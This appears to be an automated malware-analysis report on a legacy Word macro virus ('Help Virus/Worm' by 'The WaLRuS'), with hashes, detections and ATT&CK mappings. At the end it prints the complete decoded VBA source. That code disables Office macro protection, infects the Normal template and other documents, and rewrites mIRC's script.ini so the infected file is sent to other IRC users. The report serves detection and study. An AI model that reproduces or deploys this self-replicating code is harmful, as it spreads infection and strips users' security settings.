Win.Trojan.Psyjan Office (OLE) malware analysis — malicious · de6e71e3f3e79b19

MALICIOUS

Office (OLE)

30.5 KB Created: 2000-05-23 16:24:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 2c0fe5ede3748f33e32c16f65bb444c5 SHA-1: 077655094abc4d4f313e7d2fbdbf28d4d5db4daa SHA-256: de6e71e3f3e79b192a0747324c6a51d88ac6e24f56b6f99acee7917bcb1da015

256 Risk Score

Malware Insights

Win.Trojan.Psyjan · confidence 90%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This legacy Word macro-based malware, identified as Win.Trojan.Psycho-3 by ClamAV, uses AutoOpen and AutoClose macros to infect other documents and the Normal template. It attempts to download and execute a second-stage payload by saving a file to 'c:\mirc\download\IRC-Rules.doc' and potentially executing 'c:\mirc\mirc32.exe'. The macro also attempts to disable Word's macro security settings.

Heuristics 6

ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Psycho-3
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
    Options.VirusProtection = False
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Sub AutoClose()
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2781 bytes
SHA-256: `406a2cd3133ab7b1216bfdbe606c8d7756a8975abf1efd28712e2fea6f07cf3a`
Detection ClamAV: Doc.Trojan.Fool-5 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Help" Sub AutoOpen() 'Help Virus/Worm v1.10 'The WaLRuS 05/00 On Error Resume Next Options.ConfirmConversions = False Options.VirusProtection = False Options.SaveNormalPrompt = False CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& ActiveDocument.ReadOnlyRecommended = False System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "The WaLRuS" Set Norm = NormalTemplate.VBProject.VBComponents: Set Doc = ActiveDocument.VBProject.VBComponents If Norm.Item("Help").Name <> "Help" Then Doc("Help").Export "c:\Help.drv" Set infect = NormalTemplate.VBProject ElseIf Doc.Item("Help").Name <> "Help" Then Norm("Help").Export "c:\Help.drv" Set infect = ActiveDocument.VBProject End If infect.VBComponents.Import ("c:\Help.drv") Kill ("c:\Help.drv") ActiveDocument.Save CommandBars("Help").Controls("About Microsoft Word").Caption = "Help It's The WaLRuS" If (Second(Now()) > 55) Then Call Help End Sub Sub AutoClose() On Error Resume Next If (Second(Now()) > 50) Then installed = Dir("c:\mirc\mirc32.exe") If installed = "" Then Exit Sub Else reproduce = Dir("c:\mirc\download\IRC-Rules.doc") If reproduce = "" Then ActiveDocument.SaveAs "c:\mirc\download\IRC-Rules.doc" Kill "c:\mirc\script.ini" Open "c:\mirc\script.ini" For Output As #1 Print #1, "[script]" Print #1, "n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\mirc\download\IRC-Rules.doc }" Print #1, "n1=on 1:CONNECT: {" Print #1, "n2= /join #virus " Print #1, "n3= /msg #virus Help me if you can im feeling down. Im infected with the Help Virus by The WaLRuS" Print #1, "n4= /part #virus" Print #1, "n5= /clear" Print #1, "n6= /motd" Print #1, "n7= }" Close #1 End If End If End Sub Sub HelpAbout() On Error Resume Next MsgBox "Help by The WaLRuS", 0, "Help I Need Somebody" End Sub Sub Help() On Error Resume Next Assistant.Visible = True With Assistant.NewBalloon .Icon = msoIconAlert .Text = "I do appreciate you being around" .Heading = "GREETINGS" .Show End With End Sub Sub ToolsMacro() End Sub Sub FileTemplates() End Sub Sub ViewVBCode() End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.